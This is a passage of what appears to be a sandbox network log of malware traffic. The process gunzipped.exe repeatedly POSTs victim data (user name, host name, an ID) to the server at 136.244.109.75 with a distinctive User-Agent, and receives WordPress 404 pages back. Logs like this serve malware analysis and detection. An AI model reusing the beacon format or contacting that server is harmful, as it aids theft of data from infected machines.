                          Apr 17, 2024 03:17:42.471700907 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          33192.168.2.549745136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:42.872386932 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:43.080470085 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:43.987329960 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:42 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:43.987350941 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:43.987368107 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:43.987384081 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:43.987399101 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:43.987415075 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:43.987431049 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:43.987447023 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:43.987462044 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:43.987479925 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          34192.168.2.549746136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:44.338890076 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:44.542341948 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:45.475289106 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:44 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:45.475322962 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:45.475341082 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:45.475358009 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:45.475378036 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:45.475394011 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:45.475410938 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:45.475428104 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:45.475444078 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:45.475462914 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.549748136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:45.817567110 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:46.020745039 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:46.936615944 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:45 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
